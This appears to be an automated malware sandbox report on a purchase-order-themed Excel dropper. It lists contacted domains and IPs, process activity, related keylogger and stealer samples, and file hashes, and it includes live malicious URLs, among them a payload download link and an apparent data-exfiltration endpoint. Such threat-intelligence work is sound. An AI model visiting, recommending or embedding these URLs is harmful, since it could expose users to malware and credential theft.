http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://baitalasma.com/T76434567000.exe	0%	Avira URL Cloud	safe
https://baitalasma.com/T7643	0%	Avira URL Cloud	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/81.181.54.1044	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/81.181.54.104	0%	Avira URL Cloud	safe
https://baitalasma.com/T76434567000.exe	0%	Avira URL Cloud	safe
https://baitalasma.com/T76434567000.exeate	0%	Avira URL Cloud	safe
https://baitalasma.com/T76434567000.exe~x	0%	Avira URL Cloud	safe
https://scratchdreams.tk	100%	Avira URL Cloud	malware
https://scratchdreams.tk/_send_.php?TS	100%	Avira URL Cloud	malware
http://baitalasma.com/T76434567000.exej	0%	Avira URL Cloud	safe
https://baitalasma.com/T76434567000.exeqqC:	0%	Avira URL Cloud	safe
https://scratchdreams.tk	18%	Virustotal		Browse
https://scratchdreams.tk/_send_.php?TS	16%	Virustotal		Browse
https://baitalasma.com/	0%	Avira URL Cloud	safe
https://baitalasma.com/	4%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
baitalasma.com	38.242.255.115	true	true	4%, Virustotal, Browse	unknown
reallyfreegeoip.org	172.67.177.134	true	false	2%, Virustotal, Browse	unknown
checkip.dyndns.com	158.101.44.242	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://baitalasma.com/T76434567000.exe	true	Avira URL Cloud: safe	unknown
https://baitalasma.com/T76434567000.exe	true	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/81.181.54.104	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.entrust.net/server1.crl0	EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net03	EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://baitalasma.com/T7643	EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002424000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.00000000024FB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/81.181.54.1044	RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://baitalasma.com/T76434567000.exeate	EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://baitalasma.com/T76434567000.exe~x	EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://scratchdreams.tk	RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://reallyfreegeoip.org	RegSvcs.exe, 00000009.00000002.887723750.0000000002458000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002528000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://scratchdreams.tk/_send_.php?TS	RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://checkip.dyndns.com	RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://baitalasma.com/T76434567000.exej	EQNEDT32.EXE, 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.comodo.com/CPS0	EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://baitalasma.com/T76434567000.exeqqC:	EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://baitalasma.com/	EQNEDT32.EXE, 00000002.00000003.526417075.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.526541779.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
38.242.255.115	baitalasma.com	United States	36336	NATIXISUS	true
104.21.67.152	unknown	United States	13335	CLOUDFLARENETUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1436299
Start date and time:	2024-05-04 10:07:50 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Orden de compra 0001-00255454.xlam.xlsx
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@13/16@20/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 103 Number of non-executed functions: 182
Cookbook Comments:	Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer Override analysis time to 17113.6306484895 for current running targets taking high CPU consumption Override analysis time to 34227.2612969791 for current running targets taking high CPU consumption Override analysis time to 68454.5225939582 for current running targets taking high CPU consumption Override analysis time to 136909.045187916 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:12:03	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
10:09:26	API Interceptor	551x Sleep call for process: EQNEDT32.EXE modified
10:12:00	API Interceptor	486x Sleep call for process: RegSvcs.exe modified
10:12:12	API Interceptor	10x Sleep call for process: wscript.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
38.242.255.115	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	baitalasma.com/9876557.exe
	0876543456700076.xlam.xlsx	Get hash	malicious	Remcos, DBatLoader	Browse	baitalasma.com/FACT09865456000900.exe
	Orden de compra 001-0025454.xlam.xlsx	Get hash	malicious	Unknown	Browse	baitalasma.com/Orden%20de%20compra%200001-002554.exe
	T56700986579999.xlam.xlsx	Get hash	malicious	Unknown	Browse	baitalasma.com/Orden%20de%20compra-675100.exe
104.21.67.152	DNXS-04-22.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	Payment_Advice.scr.exe	Get hash	malicious	Snake Keylogger	Browse
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse
	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse
158.101.44.242	Payment_Advice.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Pnihosiyvr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	checkip.dyndns.org/
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	lxdriver_setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	Hitomi Downloader.exe	Get hash	malicious	Agent Tesla, AgentTesla, RisePro Stealer	Browse	checkip.dyndns.org/
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Payment_Draft_confirmation.xla.xlsx	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
baitalasma.com	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	38.242.255.115
	0876543456700076.xlam.xlsx	Get hash	malicious	Remcos, DBatLoader	Browse	38.242.255.115
	Orden de compra 001-0025454.xlam.xlsx	Get hash	malicious	Unknown	Browse	38.242.255.115
	T56700986579999.xlam.xlsx	Get hash	malicious	Unknown	Browse	38.242.255.115
checkip.dyndns.com	FATURA VE BELGELER..exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	PO_287104.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.130.0
	DNXS-04-22.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.130.0
	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.6.168
	Payment_Advice.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Payment_Advice.scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe	Get hash	malicious	Unknown	Browse	193.122.130.0
	SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe	Get hash	malicious	Unknown	Browse	193.122.6.168
reallyfreegeoip.org	FATURA VE BELGELER..exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	DNXS-04-22.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.67.152
	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.67.152
	Payment_Advice.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Payment_Advice.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.67.152
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Supplier Order Scan 0001293039493.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.13.205
	file.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	DHL_VTER000105453.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	DHL_VTER000105450.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	DHL Receipt_AWB 9899691321..exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	E7236252-receipt.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	I7336446-receipt.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	S94847456-receipt.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	S847453-receipt.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	4365078236450.LnK.lnk	Get hash	malicious	Unknown	Browse	172.67.139.174
NATIXISUS	New Order INQ-087867.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	38.242.240.108
	http://dhlexpress.name	Get hash	malicious	Unknown	Browse	38.242.142.127
	http://DhLexpress.name	Get hash	malicious	Unknown	Browse	38.242.142.127
	http://DhLexpress.name	Get hash	malicious	Unknown	Browse	38.242.142.127
	https://220420241.blob.core.windows.net/web/index.html?id=999	Get hash	malicious	Unknown	Browse	38.242.147.66
	Q2bIN963Kt.elf	Get hash	malicious	Mirai, Okiru	Browse	38.243.217.20
	Del3SHndZJ.elf	Get hash	malicious	Mirai	Browse	38.243.45.143
	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	38.242.255.115
	0876543456700076.xlam.xlsx	Get hash	malicious	Remcos, DBatLoader	Browse	38.242.255.115
	Statement of Accounts.exe	Get hash	malicious	AgentTesla	Browse	38.242.240.108
ORACLE-BMC-31898US	JJXXAhUWC.ps1	Get hash	malicious	Unknown	Browse	132.145.172.253
	PO_287104.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.130.0
	DNXS-04-22.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.130.0
	PO 32187 #290424.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.6.168
	Payment_Advice.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Payment_Advice.scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	https://meet.servers.getgo.com/opener/e30.eyJpYXQiOjE3MTQ0OTcwOTYsImxhdW5jaFBhcmFtcyI6eyJidWlsZCI6IjE5OTUwIiwidGVsZW1ldHJ5VVJMIjoiaHR0cHM6Ly9sYXVuY2hzdGF0dXMuZ2V0Z28uY29tL2xhdW5jaGVyMi90ZWxlbWV0cnkvaGVscGVyP3Rva2VuPWcybS1yNGFnZXJmbmM4eGM1YnQwb2ZwY2poZC1iMTk5NTAtc2Nsc0pvaW5fYjBmZGI5NjFfNjM2OF80YTU2XzgwMTFfMmI0ZTlmYjEzNmRmIiwiZW5kcG9pbnRQYXJhbXMiOnsiUHJvZHVjdCI6ImcybSIsInNlc3Npb25UcmFja2luZ0lkIjoiY2xzSm9pbi1iMGZkYjk2MS02MzY4LTRhNTYtODAxMS0yYjRlOWZiMTM2ZGYiLCJsYXVuY2hVcmwiOiJtZWV0aW5nP3Nlc3Npb25UcmFja2luZ0lkPWNsc0pvaW4tYjBmZGI5NjEtNjM2OC00YTU2LTgwMTEtMmI0ZTlmYjEzNmRmJmNsaWVudEdlbmVyYXRpb249cm9sbGluZyIsImVudiI6ImxpdmUifX0sInZlcnNpb24iOiIxLjAiLCJmbG93VHlwZSI6ImpvaW4iLCJlbmRwb2ludEZsYXZvciI6eyJmbGF2b3IiOiJuZXV0cm9uIiwiZmxhdm9yRW5mb3JjZWQiOiJ0cnVlIn0sImlzRmxhdm9yRmluYWwiOnRydWV9.e30	Get hash	malicious	Unknown	Browse	150.136.248.95
	FiddlerSetup.5.0.20242.10753-latest.exe.7z	Get hash	malicious	PureLog Stealer, zgRAT	Browse	192.29.11.142
	0t102oBJAv.elf	Get hash	malicious	Mirai	Browse	150.136.104.140
	0Vjz9RSZxz.elf	Get hash	malicious	Mirai	Browse	130.61.43.131
CLOUDFLARENETUS	Supplier Order Scan 0001293039493.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.13.205
	file.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	DHL_VTER000105453.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	DHL_VTER000105450.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	DHL Receipt_AWB 9899691321..exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	E7236252-receipt.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	I7336446-receipt.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	S94847456-receipt.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	S847453-receipt.vbs	Get hash	malicious	XWorm	Browse	104.21.45.138
	4365078236450.LnK.lnk	Get hash	malicious	Unknown	Browse	172.67.139.174

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	getinher.doc	Get hash	malicious	AgentTesla	Browse	104.21.67.152 172.67.177.134
	citat-05022024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.67.152 172.67.177.134
	rE56cXOc25.rtf	Get hash	malicious	AgentTesla	Browse	104.21.67.152 172.67.177.134
	qneGb3RjUn.rtf	Get hash	malicious	AgentTesla	Browse	104.21.67.152 172.67.177.134
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	104.21.67.152 172.67.177.134
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	104.21.67.152 172.67.177.134
	QF3YL9rOxB.rtf	Get hash	malicious	AgentTesla	Browse	104.21.67.152 172.67.177.134
	citat-05012024.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.67.152 172.67.177.134
	cotizaci#U00f3n_04302024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.67.152 172.67.177.134
	SecuriteInfo.com.Exploit.ShellCode.69.24915.2103.rtf	Get hash	malicious	AgentTesla	Browse	104.21.67.152 172.67.177.134
7dcce5b76c8b17472d024758970a406b	scanned fax.docx	Get hash	malicious	Unknown	Browse	38.242.255.115
	getinher.doc	Get hash	malicious	AgentTesla	Browse	38.242.255.115
	citat-05022024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	38.242.255.115
	PAYROLL.doc	Get hash	malicious	FormBook	Browse	38.242.255.115
	Arrival Notice.doc	Get hash	malicious	FormBook	Browse	38.242.255.115
	rE56cXOc25.rtf	Get hash	malicious	AgentTesla	Browse	38.242.255.115
	qneGb3RjUn.rtf	Get hash	malicious	AgentTesla	Browse	38.242.255.115
	ls3wzs2VQr.rtf	Get hash	malicious	Unknown	Browse	38.242.255.115
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	38.242.255.115
	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	38.242.255.115

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	162
Entropy (8bit):	4.43530643106624
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
MD5:	4F8E702CC244EC5D4DE32740C0ECBD97
SHA1:	3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
SHA-256:	9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
SHA-512:	21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
Malicious:	false
Reputation:	moderate, very likely benign file
